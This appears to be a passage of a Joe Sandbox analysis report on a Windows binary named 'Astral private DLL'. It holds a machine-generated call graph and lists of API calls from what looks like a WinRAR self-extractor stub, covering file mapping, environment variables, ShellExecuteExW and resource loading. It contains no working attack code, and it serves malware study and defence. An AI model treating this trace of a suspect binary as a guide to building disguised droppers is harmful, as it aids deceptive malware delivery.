24553->24558 24559 17bf9f 24553->24559 24560 17b9c7 24554->24560 24573 17b9e0 24554->24573 24555->24554 24561 17b8d9 24556->24561 24779 17abab GetClassNameW 24558->24779 24559->24558 24562 16e617 53 API calls 24560->24562 24561->24531 24566 17b8e6 GetMessageW 24561->24566 24567 17b9d1 24562->24567 24563 17b862 24563->24531 24572 17c1fc SetDlgItemTextW 24563->24572 24564 17be55 24568 16e617 53 API calls 24564->24568 24566->24531 24570 17b8fd IsDialogMessageW 24566->24570 24801 17d4d4 24567->24801 24574 17be65 SetDlgItemTextW 24568->24574 24570->24561 24576 17b90c TranslateMessage DispatchMessageW 24570->24576 24572->24531 24579 16e617 53 API calls 24573->24579 24577 17be79 24574->24577 24576->24561 24581 16e617 53 API calls 24577->24581 24580 17ba17 24579->24580 24587 164092 _swprintf 51 API calls 24580->24587 24614 17be9c _wcslen 24581->24614 24582 17bff0 24586 17c020 24582->24586 24589 16e617 53 API calls 24582->24589 24583 17b9d9 24705 16a0b1 24583->24705 24584 17c73f 97 API calls 24584->24582 24593 17c73f 97 API calls 24586->24593 24628 17c0d8 24586->24628 24590 17ba29 24587->24590 24592 17c003 SetDlgItemTextW 24589->24592 24595 17d4d4 16 API calls 24590->24595 24591 17ba68 GetLastError 24599 17ba73 24591->24599 24600 16e617 53 API calls 24592->24600 24602 17c03b 24593->24602 24594 17c18b 24596 17c194 EnableWindow 24594->24596 24597 17c19d 24594->24597 24595->24583 24596->24597 24603 17c1ba 24597->24603 24819 1612d3 GetDlgItem EnableWindow 24597->24819 24598 17beed 24606 16e617 53 API calls 24598->24606 24711 17ac04 SetCurrentDirectoryW 24599->24711 24604 17c017 SetDlgItemTextW 24600->24604 24612 17c04d 24602->24612 24635 17c072 24602->24635 24609 17c1e1 24603->24609 24619 17c1d9 SendMessageW 24603->24619 24604->24586 24605 17ba87 24610 17ba9e 24605->24610 24611 17ba90 GetLastError 24605->24611 24606->24531 24607 17c0cb 24615 17c73f 97 API calls 24607->24615 24609->24531 24620 16e617 53 API calls 24609->24620 24616 17bb11 24610->24616 24621 17baae GetTickCount 24610->24621 24622 17bb20 24610->24622 24611->24610 24817 179ed5 32 API calls 24612->24817 24613 17c1b0 24820 1612d3 GetDlgItem EnableWindow 24613->24820 24614->24598 24623 16e617 53 API calls 24614->24623 24615->24628 24616->24622 24624 17bd56 24616->24624 24619->24609 24620->24563 24627 164092 _swprintf 51 API calls 24621->24627 24631 17bcfb 24622->24631 24632 17bcf1 24622->24632 24633 17bb39 GetModuleFileNameW 24622->24633 24629 17bed0 24623->24629 24720 1612f1 GetDlgItem ShowWindow 24624->24720 24625 17c066 24625->24635 24637 17bac7 24627->24637 24628->24594 24630 17c169 24628->24630 24644 16e617 53 API calls 24628->24644 24638 164092 _swprintf 51 API calls 24629->24638 24818 179ed5 32 API calls 24630->24818 24634 16e617 53 API calls 24631->24634 24632->24542 24632->24631 24811 16f28c 82 API calls 24633->24811 24641 17bd05 24634->24641 24635->24607 24642 17c73f 97 API calls 24635->24642 24636 17bd66 24721 1612f1 GetDlgItem ShowWindow 24636->24721 24712 16966e 24637->24712 24638->24598 24648 164092 _swprintf 51 API calls 24641->24648 24649 17c0a0 24642->24649 24644->24628 24645 17c188 24645->24594 24646 17bb5f 24647 164092 _swprintf 51 API calls 24646->24647 24651 17bb81 CreateFileMappingW 24647->24651 24652 17bd23 24648->24652 24649->24607 24653 17c0a9 DialogBoxParamW 24649->24653 24650 17bd70 24654 16e617 53 API calls 24650->24654 24656 17bbe3 GetCommandLineW 24651->24656 24687 17bc60 __InternalCxxFrameHandler 24651->24687 24665 16e617 53 API calls 24652->24665 24653->24542 24653->24607 24657 17bd7a SetDlgItemTextW 24654->24657 24659 17bbf4 24656->24659 24722 1612f1 GetDlgItem ShowWindow 24657->24722 24658 17baed 24662 17baf4 GetLastError 24658->24662 24663 17baff 24658->24663 24812 17b425 SHGetMalloc 24659->24812 24660 17bc6b ShellExecuteExW 24685 17bc88 24660->24685 24662->24663 24667 16959a 80 API calls 24663->24667 24669 17bd3d 24665->24669 24666 17bd8c SetDlgItemTextW GetDlgItem 24670 17bdc1 24666->24670 24671 17bda9 GetWindowLongW SetWindowLongW 24666->24671 24667->24616 24668 17bc10 24813 17b425 SHGetMalloc 24668->24813 24723 17c73f 24670->24723 24671->24670 24674 17bc1c 24814 17b425 SHGetMalloc 24674->24814 24677 17bccb 24677->24632 24683 17bce1 UnmapViewOfFile CloseHandle 24677->24683 24678 17c73f 97 API calls 24680 17bddd 24678->24680 24679 17bc28 24815 16f3fa 82 API calls 2 library calls 24679->24815 24748 17da52 24680->24748 24683->24632 24684 17bc3f MapViewOfFile 24684->24687 24685->24677 24688 17bcb7 Sleep 24685->24688 24687->24660 24688->24677 24688->24685 24689 17c73f 97 API calls 24692 17be03 24689->24692 24690 17be2c 24816 1612d3 GetDlgItem EnableWindow 24690->24816 24692->24690 24694 17c73f 97 API calls 24692->24694 24693->24542 24693->24564 24694->24690 24696 161378 24695->24696 24699 16131f 24695->24699 24822 16e2c1 GetWindowLongW SetWindowLongW 24696->24822 24698 161385 24698->24531 24698->24532 24698->24533 24699->24698 24821 16e2e8 62 API calls 2 library calls 24699->24821 24701 161341 24701->24698 24702 161354 GetDlgItem 24701->24702 24702->24698 24703 161364 24702->24703 24703->24698 24704 16136a SetWindowTextW 24703->24704 24704->24698 24707 16a0bb 24705->24707 24706 16a14c 24708 16a2b2 8 API calls 24706->24708 24709 16a175 24706->24709 24707->24706 24707->24709 24823 16a2b2 24707->24823 24708->24709 24709->24591 24709->24599 24711->24605 24713 169678 24712->24713 24714 1696d5 CreateFileW 24713->24714 24715 1696c9 24713->24715 24714->24715 24716 16971f 24715->24716 24717 16bb03 GetCurrentDirectoryW 24715->24717 24716->24658 24718 169704 24717->24718 24718->24716 24719 169708 CreateFileW 24718->24719 24719->24716 24720->24636 24721->24650 24722->24666 24724 17c749 __EH_prolog 24723->24724 24725 17bdcf 24724->24725 24726 17b314 ExpandEnvironmentStringsW 24724->24726 24725->24678 24737 17c780 _wcslen _wcsrchr 24726->24737 24728 17b314 ExpandEnvironmentStringsW 24728->24737 24729 17ca67 SetWindowTextW 24729->24737 24732 183e3e 22 API calls 24732->24737 24734 17c855 SetFileAttributesW 24735 17c90f GetFileAttributesW 24734->24735 24747 17c86f __cftof _wcslen 24734->24747 24735->24737 24739 17c921 DeleteFileW 24735->24739 24737->24725 24737->24728 24737->24729 24737->24732 24737->24734 24740 17cc31 GetDlgItem SetWindowTextW SendMessageW 24737->24740 24743 17cc71 SendMessageW 24737->24743 24844 171fbb CompareStringW 24737->24844 24845 17a64d GetCurrentDirectoryW 24737->24845 24847 16a5d1 6 API calls 24737->24847 24848 16a55a FindClose 24737->24848 24849 17b48e 76 API calls 2 library calls 24737->24849 24739->24737 24741 17c932 24739->24741 24740->24737 24742 164092 _swprintf 51 API calls 24741->24742 24744 17c952 GetFileAttributesW 24742->24744 24743->24737 24744->24741 24745 17c967 MoveFileW 24744->24745 24745->24737 24746 17c97f MoveFileExW 24745->24746 24746->24737 24747->24735 24747->24737 24846 16b991 51 API calls 2 library calls 24747->24846 24749 17da5c __EH_prolog 24748->24749 24850 170659 24749->24850 24751 17da8d 24854 165b3d 24751->24854 24753 17daab 24858 167b0d 24753->24858 24757 17dafe 24874 167b9e 24757->24874 24759 17bdee 24759->24689 24761 17d6a8 24760->24761 24762 17a5c6 4 API calls 24761->24762 24763 17d6ad 24762->24763 24764 17bf15 24763->24764 24765 17d6b5 GetWindow 24763->24765 24764->24538 24764->24539 24765->24764 24766 17d6d5 24765->24766 24766->24764 24767 17d6e2 GetClassNameW 24766->24767 24769 17d706 GetWindowLongW 24766->24769 24770 17d76a GetWindow 24766->24770 25318 171fbb CompareStringW 24767->25318 24769->24770 24771 17d716 SendMessageW 24769->24771 24770->24764 24770->24766 24771->24770 24772 17d72c GetObjectW 24771->24772 25319 17a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24772->25319 24774 17d743 25320 17a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24774->25320 25321 17a80c 8 API calls 24774->25321 24777 17d754 SendMessageW DeleteObject 24777->24770 24778->24553 24780 17abcc 24779->24780 24786 17abf1 24779->24786 25322 171fbb CompareStringW 24780->25322 24782 17abf6 SHAutoComplete 24783 17abff 24782->24783 24787 17b093 24783->24787 24784 17abdf 24785 17abe3 FindWindowExW 24784->24785 24784->24786 24785->24786 24786->24782 24786->24783 24788 17b09d __EH_prolog 24787->24788 24789 1613dc 84 API calls 24788->24789 24790 17b0bf 24789->24790 25323 161fdc 24790->25323 24793 17b0eb 24795 1619af 128 API calls 24793->24795 24794 17b0d9 24796 161692 86 API calls 24794->24796 24799 17b10d __InternalCxxFrameHandler ___std_exception_copy 24795->24799 24797 17b0e4 24796->24797 24797->24582 24797->24584 24798 161692 86 API calls 24798->24797 24799->24798 24800->24563 24802 17b568 5 API calls 24801->24802 24803 17d4e0 GetDlgItem 24802->24803 24804 17d536 SendMessageW SendMessageW 24803->24804 24805 17d502 24803->24805 24806 17d572 24804->24806 24807 17d591 SendMessageW SendMessageW SendMessageW 24804->24807 24808 17d50d ShowWindow SendMessageW SendMessageW 24805->24808 24806->24807 24809 17d5e7 SendMessageW 24807->24809 24810 17d5c4 SendMessageW 24807->24810 24808->24804 24809->24583 24810->24809 24811->24646 24812->24668 24813->24674 24814->24679 24815->24684 24816->24693 24817->24625 24818->24645 24819->24613 24820->24603 24821->24701 24822->24698 24824 16a2bf 24823->24824 24825 16a2e3 24824->24825 24826 16a2d6 CreateDirectoryW 24824->24826 24827 16a231 3 API calls 24825->24827 24826->24825 24828 16a316 24826->24828 24829 16a2e9 24827->24829 24830 16a325 24828->24830 24836 16a4ed 24828->24836 24831 16a329 GetLastError 24829->24831 24833 16bb03 GetCurrentDirectoryW 24829->24833 24830->24707 24831->24830 24834 16a2ff 24833->24834 24834->24831 24835 16a303 CreateDirectoryW 24834->24835 24835->24828 24835->24831 24837 17ec50 24836->24837 24838 16a4fa SetFileAttributesW 24837->24838 24839 16a510 24838->24839 24840 16a53d 24838->24840 24841 16bb03 GetCurrentDirectoryW 24839->24841 24840->24830 24842 16a524 24841->24842 24842->24840 24843 16a528 SetFileAttributesW 24842->24843 24843->24840 24844->24737 24845->24737 24846->24747 24847->24737 24848->24737 24849->24737 24851 170666 _wcslen 24850->24851 24878 1617e9 24851->24878 24853 17067e 24853->24751 24855 170659 _wcslen 24854->24855 24856 1617e9 78 API calls 24855->24856 24857 17067e 24856->24857 24857->24753 24859 167b17 __EH_prolog 24858->24859 24895 16ce40 24859->24895 24861 167b32 24862 17eb38 8 API calls 24861->24862 24863 167b5c 24862->24863 24901 174a76 24863->24901 24866 167c7d 24867 167c87 24866->24867 24868 167cf1 24867->24868 24930 16a56d 24867->24930 24872 167d50 24868->24872 24908 168284 24868->24908 24870 167d92 24870->24757 24872->24870 24936 16138b 74 API calls 24872->24936 24875 167bac 24874->24875 24877 167bb3 24874->24877 24876 172297 86 API calls 24875->24876 24876->24877 24879 1617ff 24878->24879 24890 16185a __InternalCxxFrameHandler 24878->24890 24880 161828 24879->24880 24891 166c36 76 API calls __vswprintf_c_l 24879->24891 24882 161887 24880->24882 24887 161847 ___std_exception_copy 24880->24887 24884 183e3e 22 API calls 24882->24884 24883 16181e 24892 166ca7 75 API calls 24883->24892 24886 16188e 24884->24886 24886->24890 24894 166ca7 75 API calls 24886->24894 24887->24890 24893 166ca7 75 API calls 24887->24893 24890->24853 24891->24883 24892->24880 24893->24890 24894->24890 24896 16ce4a __EH_prolog 24895->24896 24897 17eb38 8 API calls 24896->24897 24898 16ce8d 24897->24898 24899 17eb38 8 API calls 24898->24899 24900 16ceb1 24899->24900 24900->24861 24902 174a80 __EH_prolog 24901->24902 24903 17eb38 8 API calls 24902->24903 24904 174a9c 24903->24904 24905 167b8b 24904->24905 24907 170e46 80 API calls 24904->24907 24905->24866 24907->24905 24909 16828e __EH_prolog 24908->24909 24937 1613dc 24909->24937 24911 1682aa 24912 1682bb 24911->24912 25077 169f42 24911->25077 24915 1682f2 24912->24915 24945 161a04 24912->24945 25073 161692 24915->25073 24918 168389 24964 168430 24918->24964 24922 1683e8 24969 161f6d 24922->24969 24923 1682ee 24923->24915 24923->24918 24928 16a56d 7 API calls 24923->24928 25081 16c0c5 CompareStringW _wcslen 24923->25081 24926 1683f3 24926->24915 24973 163b2d 24926->24973 24985 16848e 24926->24985 24928->24923 24931 16a582 24930->24931 24935 16a5b0 24931->24935 25307 16a69b 24931->25307 24933 16a592 24934 16a597 FindClose 24933->24934 24933->24935 24934->24935 24935->24867 24936->24870 24938 1613e1 __EH_prolog 24937->24938 24939 16ce40 8 API calls 24938->24939 24940 161419 24939->24940 24941 17eb38 8 API calls 24940->24941 24944 161474 __cftof 24940->24944 24942 161461 24941->24942 24943 16b505 84 API calls 24942->24943 24942->24944 24943->24944 24944->24911 24946 161a0e __EH_prolog 24945->24946 24958 161a61 24946->24958 24960 161b9b 24946->24960 25083 1613ba 24946->25083 24948 161bc7 25086 16138b 74 API calls 24948->25086 24951 163b2d 101 API calls 24955 161c12 24951->24955 24952 161bd4 24952->24951 24952->24960 24953 161c5a 24957 161c8d 24953->24957 24953->24960 25087 16138b 74 API calls 24953->25087 24955->24953 24956 163b2d 101 API calls 24955->24956 24956->24955 24957->24960 24962 169e80 79 API calls 24957->24962 24958->24948 24958->24952 24958->24960 24959 163b2d 101 API calls 24961 161cde 24959->24961 24960->24923 24961->24959 24961->24960 24962->24961 24963 169e80 79 API calls 24963->24958 25105 16cf3d 24964->25105 24966 168440 25109 1713d2 GetSystemTime SystemTimeToFileTime 24966->25109 24968 1683a3 24968->24922 25082 171b66 72 API calls 24968->25082 24970 161f72 __EH_prolog 24969->24970 24972 161fa6 24970->24972 25110 1619af 24970->25110 24972->24926 24974 163b3d 24973->24974 24975 163b39 24973->24975 24984 169e80 79 API calls 24974->24984 24975->24926 24976 163b4f 24977 163b6a 24976->24977 24978 163b78 24976->24978 24983 163baa 24977->24983 25240 1632f7 89 API calls 2 library calls 24977->25240 25241 16286b 101 API calls 3 library calls 24978->25241 24981 163b76 24981->24983 25242 1620d7 74 API calls 24981->25242 24983->24926 24984->24976 24986 168498 __EH_prolog 24985->24986 24989 1684d5 24986->24989 24996 168513 24986->24996 25267 178c8d 103 API calls 24986->25267 24988 1684f5 24990 16851c 24988->24990 24991 1684fa 24988->24991 24989->24988 24994 16857a 24989->24994 24989->24996 24990->24996 25269 178c8d 103 API calls 24990->25269 24991->24996 25268 167a0d 152 API calls 24991->25268 24994->24996 25243 165d1a 24994->25243 24996->24926 24997 168605 24997->24996 25249 168167 24997->25249 24999 168797 25001 16a56d 7 API calls 24999->25001 25002 168802 24999->25002 25001->25002 25255 167c0d 25002->25255 25004 16d051 82 API calls 25010 16885d 25004->25010 25005 168a5f 25011 168ab6 25005->25011 25024 168a6a 25005->25024 25006 168992 25006->25005 25013 1689e1 25006->25013 25007 16898b 25272 162021 74 API calls 25007->25272 25010->24996 25010->25004 25010->25006 25010->25007 25270 168117 84 API calls 25010->25270 25271 162021 74 API calls 25010->25271 25017 168a4c 25011->25017 25275 167fc0 97 API calls 25011->25275 25012 168ab4 25018 16959a 80 API calls 25012->25018 25015 168b14 25013->25015 25013->25017 25019 16a231 3 API calls 25013->25019 25014 169105 25016 16959a 80 API calls 25014->25016 25015->25014 25033 168b82 25015->25033 25276 1698bc 25015->25276 25016->24996 25017->25012 25017->25015 25018->24996 25021 168a19 25019->25021 25021->25017 25273 1692a3 97 API calls 25021->25273 25022 16ab1a 8 API calls 25025 168bd1 25022->25025 25024->25012 25274 167db2 101 API calls 25024->25274 25028 16ab1a 8 API calls 25025->25028 25046 168be7 25028->25046 25031 168b70 25280 166e98 77 API calls 25031->25280 25033->25022 25034 168cbc 25035 168e40 25034->25035 25036 168d18 25034->25036 25038 168e66 25035->25038 25039 168e52 25035->25039 25059 168d49 25035->25059 25037 168d8a 25036->25037 25040 168d28 25036->25040 25047 168167 19 API calls 25037->25047 25042 173377 75 API calls 25038->25042 25041 169215 123 API calls 25039->25041 25043 168d6e 25040->25043 25051 168d37 25040->25051 25041->25059 25044 168e7f 25042->25044 25043->25059 25283 1677b8 111 API calls 25043->25283 25286 173020 123 API calls 25044->25286 25045 168c93 25045->25034 25281 169a3c 82 API calls 25045->25281 25046->25034 25046->25045 25054 16981a 79 API calls 25046->25054 25052 168dbd 25047->25052 25282 162021 74 API calls 25051->25282 25055 168de6 25052->25055 25056 168df5 25052->25056 25052->25059 25054->25045 25284 167542 85 API calls 25055->25284 25285 169155 93 API calls __EH_prolog 25056->25285 25063 168f85 25059->25063 25287 162021 74 API calls 25059->25287 25061 16903e 25262 169da2 25061->25262 25062 16a4ed 3 API calls 25064 1690eb 25062->25064 25063->25014 25063->25061 25070 169090 25063->25070 25261 169f09 SetEndOfFile 25063->25261 25064->25014 25288 162021 74 API calls 25064->25288 25067 169085 25068 169620 77 API calls 25067->25068 25068->25070 25070->25014 25070->25062 25071 1690fb 25289 166dcb 76 API calls 25071->25289 25074 1616a4 25073->25074 25305 16cee1 86 API calls 25074->25305 25078 169f59 25077->25078 25079 169f63 25078->25079 25306 166d0c 78 API calls 25078->25306 25079->24912 25081->24923 25082->24922 25088 161732 25083->25088 25085 1613d6 25085->24963 25086->24960 25087->24957 25089 161748 25088->25089 25100 1617a0 __InternalCxxFrameHandler 25088->25100 25090 161771 25089->25090 25101 166c36 76 API calls __vswprintf_c_l 25089->25101 25092 1617c7 25090->25092 25096 16178d ___std_exception_copy 25090->25096 25094 183e3e 22 API calls 25092->25094 25093 161767 25102 166ca7 75 API calls 25093->25102 25097 1617ce 25094->25097 25096->25100 25103 166ca7 75 API calls 25096->25103 25097->25100 25104 166ca7 75 API calls 25097->25104 25100->25085 25101->25093 25102->25090 25103->25100 25104->25100 25106 16cf4d 25105->25106 25108 16cf54 25105->25108 25107 16981a 79 API calls 25106->25107 25107->25108 25108->24966 25109->24968 25111 1619bf 25110->25111 25113 1619bb 25110->25113 25114 1618f6 25111->25114 25113->24972 25115 161945 25114->25115 25116 161908 25114->25116 25122 163fa3 25115->25122 25117 163b2d 101 API calls 25116->25117 25120 161928 25117->25120 25120->25113 25126 163fac 25122->25126 25123 163b2d 101 API calls 25123->25126 25124 161966 25124->25120 25127 161e50 25124->25127 25126->25123 25126->25124 25139 170e08 25126->25139 25128 161e5a __EH_prolog 25127->25128 25147 163bba 25128->25147 25130 161e84 25131 161732 78 API calls 25130->25131 25133 161f0b 25130->25133 25132 161e9b 25131->25132 25175 1618a9 78 API calls 25132->25175 25133->25120 25135 161eb3 25137 161ebf _wcslen 25135->25137 25176 171b84 MultiByteToWideChar 25135->25176 25177 1618a9 78 API calls 25137->25177 25140 170e0f 25139->25140 25141 170e2a 25140->25141 25145 166c31 RaiseException CallUnexpected 25140->25145 25143 170e3b SetThreadExecutionState 25141->25143 25146 166c31 RaiseException CallUnexpected 25141->25146 25143->25126 25145->25141 25146->25143 25148 163bc4 __EH_prolog 25147->25148 25149 163bf6 25148->25149 25150 163bda 25148->25150 25152 163e51 25149->25152 25155 163c22 25149->25155 25203 16138b 74 API calls 25150->25203 25220 16138b 74 API calls 25152->25220 25154 163be5 25154->25130 25155->25154 25178 173377 25155->25178 25157 163ca3 25158 163d2e 25157->25158 25174 163c9a 25157->25174 25206 16d051 25157->25206 25188 16ab1a 25158->25188 25159 163c9f 25159->25157 25205 1620bd 78 API calls 25159->25205 25161 163c71 25161->25157 25161->25159 25162 163c8f 25161->25162 25204 16138b 74 API calls 25162->25204 25165 163d41 25168 163dd7 25165->25168 25169 163dc7 25165->25169 25212 173020 123 API calls 25168->25212 25192 169215 25169->25192 25172 163dd5 25172->25174 25213 162021 74 API calls 25172->25213 25214 172297 25174->25214 25175->25135 25176->25137 25177->25133 25179 17338c 25178->25179 25180 173396 ___std_exception_copy 25178->25180 25221 166ca7 75 API calls 25179->25221 25182 1734c6 25180->25182 25183 17341c 25180->25183 25187 173440 __cftof 25180->25187 25223 18238d RaiseException 25182->25223 25222 1732aa 75 API calls 3 library calls 25183->25222 25186 1734f2 25187->25161 25189 16ab28 25188->25189 25191 16ab32 25188->25191 25190 17eb38 8 API calls 25189->25190 25190->25191 25191->25165 25193 16921f __EH_prolog 25192->25193 25224 167c64 25193->25224 25196 1613ba 78 API calls 25197 169231 25196->25197 25227 16d114 25197->25227 25199 16928a 25199->25172 25200 16d114 118 API calls 25202 169243 25200->25202 25202->25199 25202->25200 25236 16d300 97 API calls __InternalCxxFrameHandler 25202->25236 25203->25154 25204->25174 25205->25157 25207 16d084 25206->25207 25208 16d072 25206->25208 25238 16603a 82 API calls 25207->25238 25237 16603a 82 API calls 25208->25237 25211 16d07c 25211->25158 25212->25172 25213->25174 25215 1722a1 25214->25215 25216 1722ba 25215->25216 25219 1722ce 25215->25219 25239 170eed 86 API calls 25216->25239 25218 1722c1 25218->25219 25220->25154 25221->25180 25222->25187 25223->25186 25225 16b146 GetVersionExW 25224->25225 25226 167c69 25225->25226 25226->25196 25231 16d12a __InternalCxxFrameHandler 25227->25231 25228 16d29a 25229 16d2ce 25228->25229 25230 16d0cb 6 API calls 25228->25230 25232 170e08 SetThreadExecutionState RaiseException 25229->25232 25230->25229 25231->25228 25233 16d291 25231->25233 25234 178c8d 103 API calls 25231->25234 25235 16ac05 91 API calls 25231->25235 25232->25233 25233->25202 25234->25231 25235->25231 25236->25202 25237->25211 25238->25211 25239->25218 25240->24981 25241->24981 25242->24983 25244 165d2a 25243->25244 25290 165c4b 25244->25290 25246 165d95 25246->24997 25248 165d5d 25248->25246 25295 16b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25248->25295 25250 168186 25249->25250 25251 168232 25250->25251 25302 16be5e 19 API calls __InternalCxxFrameHandler 25250->25302 25301 171fac CharUpperW 25251->25301 25254 16823b 25254->24999 25256 167c22 25255->25256 25257 167c5a 25256->25257 25303 166e7a 74 API calls 25256->25303 25257->25010 25259 167c52 25304 16138b 74 API calls 25259->25304 25261->25061 25263 169db3 25262->25263 25265 169dc2 25262->25265 25264 169db9 FlushFileBuffers 25263->25264 25263->25265 25264->25265 25266 169e3f SetFileTime 25265->25266 25266->25067 25267->24989 25268->24996 25269->24996 25270->25010 25271->25010 25272->25006 25273->25017 25274->25012 25275->25017 25277 1698c5 GetFileType 25276->25277 25278 168b5a 25276->25278 25277->25278 25278->25033 25279 162021 74 API calls 25278->25279 25279->25031 25280->25033 25281->25034 25282->25059 25283->25059 25284->25059 25285->25059 25286->25059 25287->25063 25288->25071 25289->25014 25296 165b48 25290->25296 25293 165c6c 25293->25248 25294 165b48 2 API calls 25294->25293 25295->25248 25299 165b52 25296->25299 25297 165c3a 25297->25293 25297->25294 25299->25297 25300 16b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25299->25300 25300->25299 25301->25254 25302->25251 25303->25259 25304->25257 25306->25079 25308 16a6a8 25307->25308 25309 16a727 FindNextFileW 25308->25309 25310 16a6c1 FindFirstFileW 25308->25310 25312 16a732 GetLastError 25309->25312 25317 16a709 25309->25317 25311 16a6d0 25310->25311 25310->25317 25313 16bb03 GetCurrentDirectoryW 25311->25313 25312->25317 25314 16a6e0 25313->25314 25315 16a6e4 FindFirstFileW 25314->25315 25316 16a6fe GetLastError 25314->25316 25315->25316 25315->25317 25316->25317 25317->24933 25318->24766 25319->24774 25320->24774 25321->24777 25322->24784 25324 169f42 78 API calls 25323->25324 25325 161fe8 25324->25325 25326 162005 25325->25326 25327 161a04 101 API calls 25325->25327 25326->24793 25326->24794 25328 161ff5 25327->25328 25328->25326 25330 16138b 74 API calls 25328->25330 25330->25326 25331 1613e1 84 API calls 2 library calls 25374 1794e0 GetClientRect 25399 1721e0 26 API calls std::bad_exception::bad_exception 25415 17f2e0 46 API calls __RTC_Initialize 25416 18bee0 GetCommandLineA GetCommandLineW 25400 16f1e8 FreeLibrary

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00170863: GetModuleHandleW.KERNEL32(kernel32), ref: 0017087C
                                                                  • Part of subcall function 00170863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017088E
                                                                  • Part of subcall function 00170863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001708BF
                                                                  • Part of subcall function 0017A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0017A655
                                                                  • Part of subcall function 0017AC16: OleInitialize.OLE32(00000000), ref: 0017AC2F
                                                                  • Part of subcall function 0017AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0017AC66
                                                                  • Part of subcall function 0017AC16: SHGetMalloc.SHELL32(001A8438), ref: 0017AC70
                                                                • GetCommandLineW.KERNEL32 ref: 0017DF5C
                                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0017DF83
                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0017DF94
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0017DFCE
                                                                  • Part of subcall function 0017DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0017DBF4
                                                                  • Part of subcall function 0017DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0017DC30
                                                                • CloseHandle.KERNEL32(00000000), ref: 0017DFD7
                                                                • GetModuleFileNameW.KERNEL32(00000000,001BEC90,00000800), ref: 0017DFF2
                                                                • SetEnvironmentVariableW.KERNEL32(sfxname,001BEC90), ref: 0017DFFE
                                                                • GetLocalTime.KERNEL32(?), ref: 0017E009
                                                                • _swprintf.LIBCMT ref: 0017E048
                                                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0017E05A
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0017E061
                                                                • LoadIconW.USER32(00000000,00000064), ref: 0017E078
                                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0017E0C9
                                                                • Sleep.KERNEL32(?), ref: 0017E0F7
                                                                • DeleteObject.GDI32 ref: 0017E130
                                                                • DeleteObject.GDI32(?), ref: 0017E140
                                                                • CloseHandle.KERNEL32 ref: 0017E183
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                • API String ID: 3049964643-2070194233
                                                                • Opcode ID: 94677a67990c3a8b59e4b245f76a1350f54f3bae92f3b4e5824b324f73347f03
                                                                • Instruction ID: 7084067257b852f0a3241079aa534f6f1bf1494437cc1770a51b2e361b2ce166
                                                                • Opcode Fuzzy Hash: 94677a67990c3a8b59e4b245f76a1350f54f3bae92f3b4e5824b324f73347f03
                                                                • Instruction Fuzzy Hash: F7610471904304AFD721ABB4ED4AF6B7BFCAF59700F04442AF909926E1DB7499C4CB62

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 812 17a6c2-17a6df FindResourceW 813 17a6e5-17a6f6 SizeofResource 812->813 814 17a7db 812->814 813->814 816 17a6fc-17a70b LoadResource 813->816 815 17a7dd-17a7e1 814->815 816->814 817 17a711-17a71c LockResource 816->817 817->814 818 17a722-17a737 GlobalAlloc 817->818 819 17a7d3-17a7d9 818->819 820 17a73d-17a746 GlobalLock 818->820 819->815 821 17a7cc-17a7cd GlobalFree 820->821 822 17a74c-17a76a call 180320 CreateStreamOnHGlobal 820->822 821->819 825 17a7c5-17a7c6 GlobalUnlock 822->825 826 17a76c-17a78e call 17a626 822->826 825->821 826->825 831 17a790-17a798 826->831 832 17a7b3-17a7c1 831->832 833 17a79a-17a7ae GdipCreateHBITMAPFromBitmap 831->833 832->825 833->832 834 17a7b0 833->834 834->832
                                                                APIs
                                                                • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0017B73D,00000066), ref: 0017A6D5
                                                                • SizeofResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A6EC
                                                                • LoadResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A703
                                                                • LockResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A712
                                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0017B73D,00000066), ref: 0017A72D
                                                                • GlobalLock.KERNEL32(00000000), ref: 0017A73E
